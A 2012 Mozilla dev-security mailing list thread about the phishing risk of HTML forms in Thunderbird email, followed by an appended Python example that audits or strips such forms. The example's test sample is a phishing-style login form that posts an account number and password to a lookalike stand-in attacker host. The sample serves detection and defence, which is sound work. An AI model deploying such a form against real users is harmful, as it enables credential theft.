Hi Mark,

Email phishing via HTML forms is not uncommon now but usually done via attachments. Being able to do it inline within the email probably would not help the situation any. :)

Lucas.
On 2/24/2012 2:09 AM, Mark Banner wrote:
> Since Thunderbird 2, we've had a bug on file [1] where forms in email can't
> be submitted. This was due to how we changed our content handling to allow
> tabs that can view web pages.
>
> Whilst I think we could fix this, the more I think about it, the more I am
> concerned about the security implications of forms in emails.
>
> I think the biggest concern is from phishing attacks - e.g. a user receives
> an email with form elements due to their bank having issues and needing to
> log in.
>
> With no indication of where the submission is going to, the user could be at
> serious risk.
>
> I should note, this is only a problem where the user selects to view
> "Original HTML". Viewing plain text or "Simple HTML" isn't an issue.
>
> So I don't think it is right to "fix" form handling to just work as it used
> to, but I'm not sure about the way forward.
>
> I can see a couple of options:
>
> - Don't allow the display of the form at all, even in original html mode.
> - Somehow hook into the form submission, or the email display and indicate
>   where the form will be submitted to.
>
> I'm not sure if the latter is possible, or sensible from a security
> perspective.
>
> Does anyone else have any ideas, suggestions, comments?
>
> Mark.
>
> [1] https://bugzilla.mozilla.org/show_bug.cgi?id=533545
> _______________________________________________
> dev-security mailing list
> dev-security@lists.mozilla.org
> https://lists.mozilla.org/listinfo/dev-security
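The two options Mark lists (drop forms from the rendered mail, or surface where a form would submit to) can both be prototyped as a pass over the HTML body before it is displayed. The block below is an added example for this thread, not Thunderbird code and not anything either poster wrote. It uses only the Python standard library; the sample message, the "example-bank.com" sender domain and the attacker host are constructed for illustration.

```python
"""Audit or strip <form> elements in an HTML email body before display.

Added example (not Thunderbird's implementation). It shows the two options
from the thread: report each form's submission target relative to the sender,
or remove forms entirely while keeping the rest of the message.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse


class FormAuditor(HTMLParser):
    """Collects every <form>, its target and the input fields it carries."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None  # form dict we are inside, if any

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            action = attrs.get("action") or ""
            target = urlparse(action)
            self._current = {
                "action": action,
                "method": (attrs.get("method") or "get").lower(),
                "host": (target.hostname or "").lower(),
                "scheme": target.scheme.lower(),
                "fields": [],
            }
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current["fields"].append((attrs.get("type") or "text").lower())

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def audit_forms(html_body, sender_domain):
    """Return one finding per form, flagging what a warning UI would show."""
    auditor = FormAuditor()
    auditor.feed(html_body)
    auditor.close()
    sender_domain = sender_domain.lower()
    findings = []
    for form in auditor.forms:
        host = form["host"]
        # Exact match or a true subdomain; "bank.com.attacker.example" fails.
        same_org = host == sender_domain or host.endswith("." + sender_domain)
        findings.append({
            "submits_to": form["action"] or "(relative: no destination)",
            "method": form["method"],
            "plaintext": form["scheme"] == "http",
            "collects_password": "password" in form["fields"],
            "matches_sender": bool(host) and same_org,
        })
    return findings


class FormStripper(HTMLParser):
    """Re-emits the HTML with every <form>...</form> block replaced by a note."""

    def __init__(self):
        super().__init__(convert_charrefs=False)
        self.out = []
        self._depth = 0   # nesting depth inside <form>; 0 means emit
        self.removed = 0

    def _emit(self, text):
        if self._depth == 0:
            self.out.append(text)

    def handle_starttag(self, tag, attrs):
        if tag == "form":
            if self._depth == 0:
                self.removed += 1
                self.out.append("[form removed]")
            self._depth += 1
            return
        self._emit(self.get_starttag_text())

    def handle_startendtag(self, tag, attrs):
        self._emit(self.get_starttag_text())  # e.g. <br/>; keep as written

    def handle_endtag(self, tag):
        if tag == "form":
            self._depth = max(0, self._depth - 1)
            return
        self._emit("</%s>" % tag)

    def handle_data(self, data):
        self._emit(data)

    def handle_entityref(self, name):
        self._emit("&%s;" % name)

    def handle_charref(self, name):
        self._emit("&#%s;" % name)

    def handle_decl(self, decl):
        self._emit("<!%s>" % decl)


def strip_forms(html_body):
    """Return (sanitized_html, number_of_forms_removed)."""
    stripper = FormStripper()
    stripper.feed(html_body)
    stripper.close()
    return "".join(stripper.out), stripper.removed


# Constructed phishing-style sample: the action host only looks like the bank.
SAMPLE_EMAIL = """<html><body>
<p>Dear customer, please confirm your details.</p>
<form action="http://example-bank.com.attacker.example/login" method="post">
  Account: <input name="acct"><br/>
  Password: <input type="password" name="pw">
  <input type="submit" value="Log in">
</form>
<p>Regards, Example Bank</p>
</body></html>"""

if __name__ == "__main__":
    for finding in audit_forms(SAMPLE_EMAIL, "example-bank.com"):
        print(finding)
    print(strip_forms(SAMPLE_EMAIL)[0])
```

Run on the constructed sample, `audit_forms` reports a POST over plain HTTP to a host that does not match the sender and that collects a password, which is exactly the information a "this form submits to X" indicator would need; `strip_forms` returns the same message with the form replaced by a marker, leaving the surrounding text intact. A form that is never closed swallows the rest of the body in the stripper, which fails closed rather than open.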